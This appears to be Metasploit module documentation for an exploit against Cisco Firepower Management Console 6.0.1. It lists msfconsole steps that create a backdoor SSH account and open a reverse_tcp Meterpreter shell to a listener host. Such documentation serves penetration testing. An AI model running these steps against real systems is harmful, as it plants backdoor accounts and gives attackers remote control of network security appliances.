This module exploits a vulnerability in Cisco Firepower Management Console RCE. It will
create a backdoor SSH account via HTTPS, and then obtain a native payload session
in SSH.

## Vulnerable Application

This exploit was specifically written against 6.0.1 (build 1213). To test, you can find the
virtual appliance here:

https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=286271056&release=6.0.1&flowid=54052



## Verification Steps

1. Start msfconsole
2. ```use exploit/linux/http/cisco_firepower_useradd```
3. ```set password [https console password for admin]```
4. ```set rhost [IP]```
5. ```set payload linux/x86/meterpreter/reverse_tcp```
6. ```set lhost [IP]```
7. ```exploit```
8. You should get a session

## Options

**USERNAME** The username for Cisco Firepower Management console.

**PASSWORD** The password for Cisco Firepower Management console.

**NEWSSHUSER** The SSH account to create. By default, this is random.

**NEWSSHPASS** The SSH password for the new account. By default, this is also random.

**SSHPORT** In case for some reason, the SSH changed, otherwise this is 22 by default.